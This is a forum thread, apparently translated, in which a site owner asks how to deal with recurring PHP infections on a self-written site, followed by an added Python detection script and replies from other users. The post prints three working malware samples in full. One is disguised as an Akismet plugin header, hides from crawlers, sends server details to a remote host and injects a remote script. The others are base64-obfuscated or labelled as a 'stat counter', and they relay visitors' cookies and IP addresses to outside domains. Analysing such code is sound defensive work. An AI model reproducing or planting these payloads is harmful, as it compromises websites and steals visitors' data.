samakin

Viruses on the site


<?php
#1a48cd#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/

if( empty( $rj ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }

        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }

        $rj['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $rj['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $rj['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $rj['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $rj['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $rj['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
        $rj['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];

        $rj = __url_get_contents("http://jvoroshilova.ru/ngmt3dlp.php" . "?fid=233042&info=" . http_build_query( $rj ) . "&no=1", 1);
        echo "<script type=\"text/javascript\" src=\"http://jvoroshilova.ru/ngmt3dlp.php?id=3968684\"></script>";
    }
}
#/1a48cd#
?>

All the index.* files on the hosting keep getting infected with crap roughly like this... this one is from the latest batch...

+ some files like this:

<? $GLOBALS['_1707690220_']=Array(base64_decode('' .'ZXJyb3Jf' .'cm' .'Vwb3J' .'0aW' .'5n'),base64_decode('aW5pX3' .'N' .'ldA=='),base64_decode('' .'c' .'3' .'RycG9z'),base64_decode('ZGl' .'y'),base64_decode('Zm' .'lsZV9wdXRfY29udG' .'VudHM='),base64_decode('bXR' .'fcmFuZ' .'A=='),base64_decode('' .'Y3V' .'ybF9p' .'b' .'ml0'),base64_decode('Y3VybF' .'9zZXRvcH' .'Q' .'='),base64_decode('' .'Y3Vyb' .'F' .'9zZXR' .'vcH' .'Q='),base64_decode('' .'c29ja2V0X2N' .'v' .'bm5lY3Q='),base64_decode('b' .'X' .'Rfc' .'mFu' .'ZA=' .'='),base64_decode('Y3' .'VybF9z' .'ZXR' .'vcHQ='),base64_decode('YXJy' .'Y' .'Xlfc2hp' .'ZnQ' .'='),base64_decode('Y3VybF' .'9zZXRv' .'cH' .'Q='),base64_decode('Y3VybF9zZXR' .'vcHQ='),base64_decode('c29' .'ja2V' .'0X2dld' .'HB' .'lZXJu' .'YW1l'),base64_decode('bX' .'Rfc' .'mFu' .'ZA=' .'='),base64_decode('Y3VybF9leGVj'),base64_decode('Y3V' .'ybF9nZXR' .'pbmZv'),base64_decode('Y3Vy' .'bF9nZ' .'XR' .'pbmZv'),base64_decode('Y' .'3V' .'ybF' .'9' .'jbG' .'9' .'zZQ=='),base64_decode('aGVhZGVy'),base64_decode('' .'aGV' .'hZGVy'),base64_decode('a' .'XN' .'fYXJyYXk' .'='),base64_decode('a' .'XNfYXJyY' .'Xk' .'='),base64_decode('' .'dXJsZ' .'W5jb2Rl'),base64_decode('d' .'XJsZW5jb' .'2Rl'),base64_decode('' .'c3V' .'i' .'c3Ry'),base64_decode('c3Ryb' .'G' .'Vu')); ?><? 
function _244453390($i){$a=Array('' .'ZG' .'lzcGx' .'heV' .'9lcnJv' .'cnM=','a' .'HR0c' .'D' .'ovL3' .'J' .'lbnQtYXBhcnR' .'t' .'ZW50' .'cy5' .'ydS9' .'za2FjaGF0LnBocA==','e' .'WhmYg=' .'=','a2F2cmM=','' .'a' .'HJxdng' .'=','YXZtbW' .'pubnh' .'j' .'amh' .'zeGc=','cWJ3e' .'g==','' .'MTI5L' .'n' .'Bpcm' .'96ZWsucnUv','bg=' .'=','Lw=' .'=','Lw==','SFR' .'UUF9DTElFTl' .'RfSVA=','' .'SFRUUF9D' .'TElFTl' .'R' .'fS' .'VA' .'=','SFRUU' .'F' .'9YX0ZPUld' .'B' .'U' .'kRFRF9' .'GT' .'1I=','SF' .'R' .'UU' .'F9' .'YX0ZP' .'Ul' .'dB' .'U' .'kRFRF9' .'GT' .'1' .'I' .'=','UkVNT1' .'RF' .'X0FERFI' .'=','YmF' .'i' .'eQ==','c' .'A=' .'=','' .'Yw==','Zg' .'==','' .'aXA=','S' .'FRUU' .'F' .'9SRUZFU' .'kVS','S' .'FR' .'UUF9V' .'U0' .'VSX0' .'FHR' .'U5U','Zm1s','N' .'DA0','SFRUU' .'C8xLjA' .'gN' .'DA0IE5vd' .'CBGb' .'3V' .'uZA=' .'=','','','W' .'w==','XQ==','PQ' .'==','Jg==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_1707690220_'][0](round(0));$GLOBALS['_1707690220_'][1](_244453390(0),round(0));$_0=_244453390(1);$_1=_244453390(2);$_2=_244453390(3);$_3=_244453390(4);if($GLOBALS['_1707690220_'][2](_244453390(5),_244453390(6))!==false)$GLOBALS['_1707690220_'][3]($_4,$_SERVER,$_5,$_3);$_6=_244453390(7);(round(0+1932.5+1932.5)-round(0+1932.5+1932.5)+round(0+1133.5+1133.5)-round(0+453.4+453.4+453.4+453.4+453.4))?$GLOBALS['_1707690220_'][4]($_7,$_2,$_6,$_2):$GLOBALS['_1707690220_'][5](round(0+306.33333333333+306.33333333333+306.33333333333),round(0+1288.3333333333+1288.3333333333+1288.3333333333));$_8=$GLOBALS['_1707690220_'][6]();$_9=_244453390(8);if(isset($_GET[$_2]))$_6.=$_GET[$_2] ._244453390(9);if(isset($_GET[$_1]))$_6.=$_GET[$_1] ._244453390(10);if(isset($_GET[$_3]))$_6.=$_GET[$_3];if(!empty($_SERVER[_244453390(11)]))$_10=$_SERVER[_244453390(12)];elseif(!empty($_SERVER[_244453390(13)]))$_10=$_SERVER[_244453390(14)];else 
$_10=$_SERVER[_244453390(15)];$_5=array(_244453390(16)=>$_0,_244453390(17)=>$_1,_244453390(18)=>$_2,_244453390(19)=>$_3,_244453390(20)=>$_10);$GLOBALS['_1707690220_'][7]($_8,10002,$_6);$GLOBALS['_1707690220_'][8]($_8,10015,l__0($_5));(round(0+879.25+879.25+879.25+879.25)-round(0+1758.5+1758.5)+round(0+421.2+421.2+421.2+421.2+421.2)-round(0+1053+1053))?$GLOBALS['_1707690220_'][9]($_2,$_7,$_8):$GLOBALS['_1707690220_'][10](round(0+543),round(0+703.4+703.4+703.4+703.4+703.4));$GLOBALS['_1707690220_'][11]($_8,19913,true);while(round(0+816+816+816)-round(0+1224+1224))$GLOBALS['_1707690220_'][12]($_SERVER,$_11);$GLOBALS['_1707690220_'][13]($_8,10016,$_SERVER[_244453390(21)]);$GLOBALS['_1707690220_'][14]($_8,10018,$_SERVER[_244453390(22)]);(round(0+646.2+646.2+646.2+646.2+646.2)-round(0+1077+1077+1077)+round(0+215.6+215.6+215.6+215.6+215.6)-round(0+359.33333333333+359.33333333333+359.33333333333))?$GLOBALS['_1707690220_'][15]($_8,$_12):$GLOBALS['_1707690220_'][16](round(0+807.75+807.75+807.75+807.75),round(0+963.4+963.4+963.4+963.4+963.4));$_4=$GLOBALS['_1707690220_'][17]($_8);$_12=$GLOBALS['_1707690220_'][18]($_8,2097154);$_13=$GLOBALS['_1707690220_'][19]($_8,1048594);$GLOBALS['_1707690220_'][20]($_8);$_14=_244453390(23);if($_12 == _244453390(24))$GLOBALS['_1707690220_'][21](_244453390(25));$GLOBALS['_1707690220_'][22]("Content-Type: $_13");echo $_4;function l__0($_11,$_15='',$_7=true){$_16=_244453390(26);if($GLOBALS['_1707690220_'][23]($_11)){foreach($_11 as $_17 => $_18){$_19=$_15;if(_244453390(27)=== $_15){$_19 .= $_17;}else{$_19 .= _244453390(28) .$_17 ._244453390(29);}if(!$GLOBALS['_1707690220_'][24]($_18)){$_16 .= $GLOBALS['_1707690220_'][25]($_19) ._244453390(30) .$GLOBALS['_1707690220_'][26]($_18) ._244453390(31);}else{$_16 .= l__0($_18,$_19,false);}}}if($_7 === true){return $GLOBALS['_1707690220_'][27]($_16,round(0),$GLOBALS['_1707690220_'][28]($_16)-round(0+0.2+0.2+0.2+0.2+0.2));}else{return $_16;}} ?>

and this:

<?php 


/**
 *
 * This file is deprecated and only exists for backwards compatibility
 *
 * @hosting stat counter package v2.1
 *
 */


	error_reporting(0);
	ini_set('display_errors',0);



$p = 'qagzm';
$b = 'http://rent-apartments.ru/book.php';
$m =  base64_decode('MjQxLmFtZXRpc3QtcHBiLnJ1Lw==');



if(isset($_GET[$p])) {
if(is_callable('curl_init')) {
$ch = curl_init();
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',' !== false)) {$tmp = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);$ip = trim($tmp[count($tmp)-2]);}
else $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_FORWARDED_FOR']; elseif (isset($_SERVER['HTTP_X_REAL_IP'])) $ip = $_SERVER['HTTP_X_REAL_IP'];
else $ip = @$_SERVER['REMOTE_ADDR'];
curl_setopt($ch, CURLOPT_URL, $m.$_GET[$p]);
curl_setopt($ch, CURLOPT_POSTFIELDS, '&p='.urlencode($b.'?'.$p.'=').'&ip='.$ip);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'hf');
if(!empty($_COOKIE)){$co='';foreach($_COOKIE as $cn => $cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}curl_setopt($ch, CURLOPT_COOKIE, $co);}
echo curl_exec($ch);exit;
} else {
$a=explode('|',"REQUEST_URI|HTTP_X_FORWARDED_FOR|HTTP_FORWARDED_FOR|HTTP_X_REAL_IP|REMOTE_ADDR|HTTP_REFERER|HTTP_USER_AGENT");
$i = explode($p.'=', $_SERVER[$a[0]]);$i = $i[1];$m = parse_url($m);
$f=fsockopen($m['host'],80) or die();$i='/'.$i;if($m['path']!='/')$i=$m['path'].$i;
if(isset($_SERVER[$a[1]])){if(strpos($_SERVER[$a[1]],',')!==false){$r=explode(',',$_SERVER[$a[1]]);$j=trim($r[count($r)-2]);}else $j=$_SERVER[$a[1]];}elseif(isset($_SERVER[$a[2]]))$j=$_SERVER[$a[2]];elseif(isset($_SERVER[$a[3]]))$j=$_SERVER[$a[3]];else$j=@$_SERVER[$a[4]];
$h="POST $i HTTP/1.1\r\nHost: ".$m['host']."\r\nContent-Type: application/x-www-form-urlencoded\r\n";
if(!empty($_SERVER[$a[5]]))$h.='Referer: '.$_SERVER[$a[5]]."\r\n";$g='&p='.urlencode($b.'?'.$p.'=').'&ip='.$j;
if(!empty($_COOKIE)){$o='';foreach($_COOKIE as $n=>$v){if($o)$o.='; ';$o.=$n.'='.addslashes($v);}$h.='Cookie: '.$o."\r\n";}
$h.='User-agent: '.$_SERVER[$a[6]]."\r\nContent-length: ".strlen($g)."\r\nConnection: Close\r\n\r\n"; 
fwrite($f,$h.$g);$r='';while(!feof($f)){$r.=fgets($f,1024);}fclose($f);
list($h,$d)=explode("\r\n\r\n",$r,2);$h=explode("\r\n",$h);
foreach($h as $l){if(strpos($l,'Content-Type')!==false||strpos($l,'404')!==false||strpos($l,'301')!==false||strpos($l,'Location')!==false||strpos($l,'Set-Cookie')!==false)header($l);if(strpos($l,'chunked')!==false)$c=true;}
if(@$c){for($o='';!empty($d);$d=trim($d)){$s=strpos($d,"\r\n");$e=hexdec(substr($d,0,$s));$o.=substr($d,$s+2,$e);$d=substr($d,$s+2+$e);}echo $o;}else echo $d;
}}
function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);}
?>

How do I treat this other than cleaning it by hand? I've even removed the Write attributes, it doesn't help...
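A triage script a defender could run over the webroot after finding files like the ones above. This is an added example, not code from the thread or from any of the posters; it assumes only the two tricks visible in the samples: the injector's own `#1a48cd#` ... `#/1a48cd#` markers around the inserted block (with a crawler check that hides the payload from search engines), and the `base64_decode('ab' .'cd' ...)` fragment concatenation the second sample uses to hide the PHP function names it calls. The sample input at the bottom is constructed for the example; `example.invalid` is a placeholder, not a domain from the thread.

```python
"""Triage helper for injected PHP of the kind shown in the thread (added example)."""
import base64
import binascii
import re
from pathlib import Path

# Block wrapped in #1a48cd# ... #/1a48cd# (any 6-hex-digit id; the same id must close it).
MARKER_RE = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S)
# base64_decode( 'frag' .'frag' ... ): PHP concatenates the single-quoted fragments first.
B64_CALL_RE = re.compile(r"base64_decode\(\s*((?:'[^']*'\s*\.?\s*)+)\)")
FRAG_RE = re.compile(r"'([^']*)'")
# Search-engine cloaking: the first sample only emits its payload to non-crawler visitors.
CLOAK_RE = re.compile(r"preg_match\s*\([^)]*googlebot", re.S | re.I)
# Names the samples resolve at runtime; seeing any of them hidden in base64 is a strong signal.
NETWORK_OR_WRITE = {"curl_init", "curl_exec", "file_put_contents", "fsockopen", "socket_connect"}


def find_marker_blocks(source: str) -> list:
    """Return [(marker_id, block_body), ...] for every marker-delimited block in source."""
    return [(m.group(1), m.group(2)) for m in MARKER_RE.finditer(source)]


def decode_concatenated_base64(source: str) -> list:
    """Join the quoted fragments of each base64_decode('..' .'..') call and decode them."""
    decoded = []
    for call in B64_CALL_RE.finditer(source):
        joined = "".join(FRAG_RE.findall(call.group(1)))
        try:
            decoded.append(base64.b64decode(joined, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64: leave that call for manual review
    return decoded


def triage(source: str) -> dict:
    """Summarise the indicators found in one file's source text."""
    blocks = find_marker_blocks(source)
    hidden = decode_concatenated_base64(source)
    report = {
        "marker_ids": [mid for mid, _ in blocks],
        "cloaking": bool(CLOAK_RE.search(source)),
        "hidden_strings": hidden,
        "hidden_network_or_write": sorted(set(hidden) & NETWORK_OR_WRITE),
    }
    report["suspicious"] = bool(
        report["marker_ids"] or report["cloaking"] or report["hidden_network_or_write"]
    )
    return report


def scan_tree(root: str, glob: str = "**/*.php") -> dict:
    """Run triage() over every matching file under root; returns {path: report} for hits only."""
    hits = {}
    for path in Path(root).glob(glob):
        try:
            report = triage(path.read_text(errors="replace"))
        except OSError:
            continue
        if report["suspicious"]:
            hits[str(path)] = report
    return hits


# Constructed sample (not a real file from the thread): it combines the two
# techniques in a few lines so the functions above can be exercised offline.
SAMPLE = r"""<?php
#1a48cd#
if( preg_match( "/(googlebot|msnbot|yahoo)/i", $_SERVER['HTTP_USER_AGENT'] ) ) {
} else {
    echo "<script src=\"http://example.invalid/x.js\"></script>";
}
#/1a48cd#
?>
<? $GLOBALS['_x']=Array(base64_decode('' .'ZXJyb3Jf' .'cm' .'Vwb3J' .'0aW' .'5n'),base64_decode('aW5pX3' .'N' .'ldA=='),base64_decode('' .'Y3V' .'ybF9p' .'b' .'ml0')); ?>
"""

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run `scan_tree("/path/to/webroot")` from a clean machine over a copy of the site, then diff the hit list against a known-good backup. The decoded names (`error_reporting`, `ini_set`, `curl_init` in the constructed sample) show what the dropper actually does without executing it, and the marker ids make it easy to confirm that every reinfected `index.*` file carries the same injector. As the later replies in the thread point out, a clean scan only tells you the files are clean now; the entry point still has to be found.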


The logs are all clean; in theory it was probably uploaded through some leaky form ;(

Is your site on WordPress? How did you find out it's a virus?


No, the engine is self-written, but about 10 years ago... ;)

I gave xqwerty's contacts to the site owner, he'll probably get in touch tomorrow - it won't be enough just to clean it up, we need to understand through which little hole they're having their way with it ;)


If various files are being modified, they're working both remotely (shells) and by hand (since the site has a TIC score and a commercial niche). They won't just leave it alone. They'll keep killing the site to the last, until it sinks and drops out of the search results.

Deleting the code will achieve nothing; you need to find the cause.

The simplest option: delete everything (the virus code) and update everything on the site (engine, plugins, etc.), but there are no guarantees.

The most expensive option: message me privately.
